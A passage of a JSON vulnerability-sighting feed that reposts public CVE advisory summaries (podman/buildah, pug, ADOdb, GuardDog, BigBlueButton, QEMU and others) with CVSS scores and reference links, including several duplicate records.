https://www.openssh.com/txt/release-9.8\n12. https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt", "creation_timestamp": "2025-04-24T19:06:47.000000Z"}, {"uuid": "756c1379-322e-4a56-9074-f81a37ca0be9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1296", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "f9df0954-1d02-42fb-ad98-1937ea45ee21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2712", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "9ce9d128-07e2-434e-8bc6-0139dd5ef2c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P493-635Q-R6GR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12168", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-21353\n\ud83d\udd25 CVSS Score: 6.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N)\n\ud83d\udd39 Description: Pug is an npm package which is a high-performance template engine.  In pug before version 3.0.1, if a remote attacker was able to control the `pretty` option of the pug compiler, e.g. if you spread a user provided object such as the query parameters of a request into the pug template inputs, it was possible for them to achieve remote code execution on the node.js backend. This is fixed in version 3.0.1.  This advisory applies to multiple pug packages including \"pug\", \"pug-code-gen\".  pug-code-gen has a backported fix at version 2.0.3. This advisory is not exploitable if there is no way for un-trusted input to be passed to pug as the `pretty` option, e.g. if you compile templates in advance before applying user input to them, you do not need to upgrade.\n\ud83d\udccf Published: 2021-03-03T01:50:18\n\ud83d\udccf Modified: 2025-04-16T22:10:03.957Z\n\ud83d\udd17 References:\n1. https://github.com/pugjs/pug/security/advisories/GHSA-p493-635q-r6gr\n2. https://github.com/pugjs/pug/issues/3312\n3. https://github.com/pugjs/pug/pull/3314\n4. https://github.com/pugjs/pug/commit/991e78f7c4220b2f8da042877c6f0ef5a4683be0\n5. https://github.com/pugjs/pug/releases/tag/pug%403.0.1\n6. https://www.npmjs.com/package/pug\n7. https://www.npmjs.com/package/pug-code-gen", "creation_timestamp": "2025-04-16T22:57:50.000000Z"}, {"uuid": "91cba2f4-fe9b-4f40-a975-42137bc8b7b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H4Q8-96P6-JCGR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12060", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-39304\n\ud83d\udd25 CVSS Score: 5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:L)\n\ud83d\udd39 Description: ghinstallation provides transport, which implements http.RoundTripper to provide authentication as an installation for GitHub Apps. In ghinstallation version 1, when the request to refresh an installation token failed, the HTTP request and response would be returned for debugging. The request contained the bearer JWT for the App, and was returned back to clients. This token is short lived (10 minute maximum). This issue has been patched and is available in version 2.0.0.\n\n\ud83d\udccf Published: 2022-12-20T19:52:28.024Z\n\ud83d\udccf Modified: 2025-04-16T14:47:35.191Z\n\ud83d\udd17 References:\n1. https://github.com/bradleyfalzon/ghinstallation/security/advisories/GHSA-h4q8-96p6-jcgr\n2. https://github.com/bradleyfalzon/ghinstallation/commit/d24f14f8be70d94129d76026e8b0f4f9170c8c3e\n3. https://docs.github.com/en/developers/apps/building-github-apps/authenticating-with-github-apps#authenticating-as-an-installation\n4. https://github.com/bradleyfalzon/ghinstallation/blob/24e56b3fb7669f209134a01eff731d7e2ef72a5c/transport.go#L172-L174", "creation_timestamp": "2025-04-16T14:56:29.000000Z"}, {"uuid": "c3bfa6f7-3f41-46c8-a4d2-6b389649d989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M3Q4-7QMJ-657M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12066", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23542\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: OpenFGA is an authorization/permission engine built for developers and inspired by Google Zanzibar. During an internal security assessment, it was discovered that OpenFGA version 0.3.0 is vulnerable to authorization bypass under certain conditions. This issue has been patched in version 0.3.1 and is backward compatible.\n\n\n\ud83d\udccf Published: 2022-12-20T20:15:16.628Z\n\ud83d\udccf Modified: 2025-04-16T14:43:38.712Z\n\ud83d\udd17 References:\n1. https://github.com/openfga/openfga/security/advisories/GHSA-m3q4-7qmj-657m\n2. https://github.com/openfga/openfga/pull/422\n3. https://github.com/openfga/openfga/releases/tag/v0.3.1", "creation_timestamp": "2025-04-16T14:56:36.000000Z"}, {"uuid": "b9954904-8cb3-41cd-8de1-ad2ccd206dce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1295", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "bcc67301-2d3e-4159-8ab2-d74386802753", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78M5-JPMF-CH7V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12244", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23530\n\ud83d\udd25 CVSS Score: 5.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior to v0.1.8 are vulnerable to arbitrary file write when scanning a specially-crafted remote PyPI package. Extracting files using shutil.unpack_archive() from a potentially malicious tarball without validating that the destination file path is within the intended destination directory can cause files outside the destination directory to be overwritten.  This issue is patched in version 0.1.8. Potential workarounds include using a safer module, like zipfile, and validating the location of the extracted files and discarding those with malicious paths.\n\ud83d\udccf Published: 2022-12-16T22:56:33.204Z\n\ud83d\udccf Modified: 2025-04-17T14:34:26.895Z\n\ud83d\udd17 References:\n1. https://github.com/DataDog/guarddog/security/advisories/GHSA-78m5-jpmf-ch7v\n2. https://github.com/DataDog/guarddog/commit/37c7d0767ba28f4df46117d478f97652594c491c\n3. https://github.com/DataDog/guarddog/blob/a1d064ceb09d39bb28deb6972bc0a278756ea91f/guarddog/scanners/package_scanner.py#L153..158", "creation_timestamp": "2025-04-17T14:58:27.000000Z"}, {"uuid": "3e8ec8e6-8827-4060-bd44-856f9f7003e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4QGC-XHW5-6QFG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12243", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23490\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: BigBlueButton is an open source web conferencing system. Versions prior to 2.4.0 expose sensitive information to Unauthorized Actors. This issue affects meetings with polls, where the attacker is a meeting participant. Subscribing to the current-poll collection does not update the client UI, but does give the attacker access to the contents of the collection, which include the individual poll responses. This issue is patched in version 2.4.0. There are no workarounds.\n\n\ud83d\udccf Published: 2022-12-16T21:02:30.109Z\n\ud83d\udccf Modified: 2025-04-17T14:34:58.102Z\n\ud83d\udd17 References:\n1. https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-4qgc-xhw5-6qfg\n2. https://github.com/bigbluebutton/bigbluebutton/releases/tag/v2.4.0", "creation_timestamp": "2025-04-17T14:58:26.000000Z"}, {"uuid": "6e223f82-e8bb-4c25-af3e-aa3f45812bf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J5G3-F74Q-RVFQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12247", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23488\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: BigBlueButton is an open source web conferencing system. Versions prior to 2.4-rc-6 are vulnerable to Insertion of Sensitive Information Into Sent Data. The moderators-only webcams lock setting is not enforced on the backend, which allows an attacker to subscribe to viewers' webcams, even when the lock setting is applied. (The required streamId was being sent to all users even with lock setting applied). This issue is fixed in version 2.4-rc-6.  There are no workarounds.\n\ud83d\udccf Published: 2022-12-17T00:28:46.567Z\n\ud83d\udccf Modified: 2025-04-17T14:33:18.205Z\n\ud83d\udd17 References:\n1. https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-j5g3-f74q-rvfq\n2. https://github.com/bigbluebutton/bigbluebutton/releases/tag/v2.4-rc-6", "creation_timestamp": "2025-04-17T14:58:33.000000Z"}, {"uuid": "aa705015-6f9f-4555-8224-5c7f1d21b563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RP2V-V467-Q9VQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12246", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23531\n\ud83d\udd25 CVSS Score: 5.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior to 0.1.5 are vulnerable to Relative Path Traversal when scanning a specially-crafted local PyPI package. Running GuardDog against a specially-crafted package can allow an attacker to write an arbitrary file on the machine where GuardDog is executed due to a path traversal vulnerability when extracting the .tar.gz file of the package being scanned, which exists by design in the tarfile.TarFile.extractall function. This issue is patched in version 0.1.5.\n\ud83d\udccf Published: 2022-12-16T23:41:15.078Z\n\ud83d\udccf Modified: 2025-04-17T14:33:54.287Z\n\ud83d\udd17 References:\n1. https://github.com/DataDog/guarddog/security/advisories/GHSA-rp2v-v467-q9vq\n2. https://github.com/DataDog/guarddog/pull/89/commits/a56aff58264cb6b7855d71b00dc10c39a5dbd306\n3. https://github.com/DataDog/guarddog/releases/tag/v0.1.5", "creation_timestamp": "2025-04-17T14:58:33.000000Z"}, {"uuid": "ca422e62-00c3-4c56-8a7a-96b5368b2e03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HJ3V-M684-V259", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12079", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-28122\n\ud83d\udd25 CVSS Score: 6.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description:  JWX is Go module implementing various JWx (JWA/JWE/JWK/JWS/JWT, otherwise known as JOSE) technologies. This vulnerability allows an attacker with a trusted public key to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. This issue has been patched in versions 1.2.29 and 2.0.21.\n\ud83d\udccf Published: 2024-03-09T00:45:50.129Z\n\ud83d\udccf Modified: 2025-04-16T15:49:42.161Z\n\ud83d\udd17 References:\n1. https://github.com/lestrrat-go/jwx/security/advisories/GHSA-hj3v-m684-v259\n2. https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29\n3. https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21", "creation_timestamp": "2025-04-16T15:56:05.000000Z"}, {"uuid": "0b3525e1-913d-4ea8-9433-33780ec97dc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RVH9-9WM3-28C7", "type": "published-proof-of-concept", "source": "Telegram/GxkwnkIopWEGLbC11BdcbbYVRqOADIf4t7f5VnXFMKG7Kn8", "content": "", "creation_timestamp": "2026-04-17T21:23:11.000000Z"}, {"uuid": "f9f99008-c6dc-4796-9afd-274681657f35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PHW3-QP59-X2V4", "type": "published-proof-of-concept", "source": "Telegram/GxkwnkIopWEGLbC11BdcbbYVRqOADIf4t7f5VnXFMKG7Kn8", "content": "", "creation_timestamp": "2026-04-17T21:23:11.000000Z"}, {"uuid": "66eaa36e-7b5e-426e-b5e4-2241d2d9b01c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-892P-PQRR-HXQR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14526", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46332\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Flags SDK is an open-source feature flags toolkit for Next.js and SvelteKit. Impacted versions include flags from 3.2.0 and prior and @vercel/flags from 3.1.1 and prior as certain circumstances allows a bad actor with detailed knowledge of the vulnerability to list all flags returned by the flags discovery endpoint (.well-known/vercel/flags). This vulnerability allows for information disclosure, where a bad actor could gain access to a list of all feature flags exposed through the flags discovery endpoint, including the flag names, flag descriptions, available options and their labels (e.g. true, false), and default flag values. This issue has been patched in flags@4.0.0, users of flags and @vercel/flags should also migrate to flags@4.0.0.\n\ud83d\udccf Published: 2025-05-02T17:06:35.443Z\n\ud83d\udccf Modified: 2025-05-02T17:06:35.443Z\n\ud83d\udd17 References:\n1. https://github.com/vercel/flags/security/advisories/GHSA-892p-pqrr-hxqr\n2. https://github.com/vercel/flags/blob/main/packages/flags/guides/upgrade-to-v4.md\n3. https://vercel.com/changelog/information-disclosure-in-flags-sdk-cve-2025-46332", "creation_timestamp": "2025-05-02T17:16:25.000000Z"}, {"uuid": "067e2e67-8746-4448-ab59-25183c3150c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6964", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14625", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7409\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU NBD Server. This vulnerability allows a denial of service (DoS) attack via improper synchronization during socket closure when a client keeps a socket open as the server is taken offline.\n\ud83d\udccf Published: 2024-08-05T13:19:27.498Z\n\ud83d\udccf Modified: 2025-05-02T23:03:01.411Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10518\n2. https://access.redhat.com/errata/RHSA-2024:10528\n3. https://access.redhat.com/errata/RHSA-2024:10813\n4. https://access.redhat.com/errata/RHSA-2024:6811\n5. https://access.redhat.com/errata/RHSA-2024:6818\n6. https://access.redhat.com/errata/RHSA-2024:6964\n7. https://access.redhat.com/errata/RHSA-2024:7408\n8. https://access.redhat.com/errata/RHSA-2024:8991\n9. https://access.redhat.com/errata/RHSA-2024:9136\n10. https://access.redhat.com/errata/RHSA-2024:9620\n11. https://access.redhat.com/errata/RHSA-2024:9912\n12. https://access.redhat.com/security/cve/CVE-2024-7409\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2302487", "creation_timestamp": "2025-05-02T23:17:20.000000Z"}, {"uuid": "4461ad31-9a02-432e-ac48-c3870fe34166", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8X27-JWJR-8545", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14548", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46337\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L)\n\ud83d\udd39 Description: ADOdb is a PHP database class library that provides abstractions for performing queries and managing databases. Prior to version 5.22.9, improper escaping of a query parameter may allow an attacker to execute arbitrary SQL statements when the code using ADOdb connects to a PostgreSQL database and calls pg_insert_id() with user-supplied data. This issue has been patched in version 5.22.9.\n\ud83d\udccf Published: 2025-05-01T17:20:10.658Z\n\ud83d\udccf Modified: 2025-05-02T17:57:58.870Z\n\ud83d\udd17 References:\n1. https://github.com/ADOdb/ADOdb/security/advisories/GHSA-8x27-jwjr-8545\n2. https://github.com/ADOdb/ADOdb/issues/1070\n3. https://github.com/ADOdb/ADOdb/commit/11107d6d6e5160b62e05dff8a3a2678cf0e3a426", "creation_timestamp": "2025-05-02T18:19:42.000000Z"}, {"uuid": "ff4201b5-2ca4-4dde-ab25-73095ea740b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8991", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14625", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7409\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU NBD Server. This vulnerability allows a denial of service (DoS) attack via improper synchronization during socket closure when a client keeps a socket open as the server is taken offline.\n\ud83d\udccf Published: 2024-08-05T13:19:27.498Z\n\ud83d\udccf Modified: 2025-05-02T23:03:01.411Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10518\n2. https://access.redhat.com/errata/RHSA-2024:10528\n3. https://access.redhat.com/errata/RHSA-2024:10813\n4. https://access.redhat.com/errata/RHSA-2024:6811\n5. https://access.redhat.com/errata/RHSA-2024:6818\n6. https://access.redhat.com/errata/RHSA-2024:6964\n7. https://access.redhat.com/errata/RHSA-2024:7408\n8. https://access.redhat.com/errata/RHSA-2024:8991\n9. https://access.redhat.com/errata/RHSA-2024:9136\n10. https://access.redhat.com/errata/RHSA-2024:9620\n11. https://access.redhat.com/errata/RHSA-2024:9912\n12. https://access.redhat.com/security/cve/CVE-2024-7409\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2302487", "creation_timestamp": "2025-05-02T23:17:20.000000Z"}, {"uuid": "b7c8c81a-1ddf-4e29-9727-888b1449b269", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9912", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14625", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7409\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU NBD Server. This vulnerability allows a denial of service (DoS) attack via improper synchronization during socket closure when a client keeps a socket open as the server is taken offline.\n\ud83d\udccf Published: 2024-08-05T13:19:27.498Z\n\ud83d\udccf Modified: 2025-05-02T23:03:01.411Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10518\n2. https://access.redhat.com/errata/RHSA-2024:10528\n3. https://access.redhat.com/errata/RHSA-2024:10813\n4. https://access.redhat.com/errata/RHSA-2024:6811\n5. https://access.redhat.com/errata/RHSA-2024:6818\n6. https://access.redhat.com/errata/RHSA-2024:6964\n7. https://access.redhat.com/errata/RHSA-2024:7408\n8. https://access.redhat.com/errata/RHSA-2024:8991\n9. https://access.redhat.com/errata/RHSA-2024:9136\n10. https://access.redhat.com/errata/RHSA-2024:9620\n11. https://access.redhat.com/errata/RHSA-2024:9912\n12. https://access.redhat.com/security/cve/CVE-2024-7409\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2302487", "creation_timestamp": "2025-05-02T23:17:20.000000Z"}, {"uuid": "f0645748-d862-4bca-b69f-31f4d68a5adf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MG2H-6X62-WPWC", "type": "published-proof-of-concept", "source": "Telegram/99IlCP_IS9qBv42yzAhiUHqlKgiNRb4WP8dx5pH1uskzhuw", "content": "", "creation_timestamp": "2026-04-17T17:30:37.000000Z"}, {"uuid": 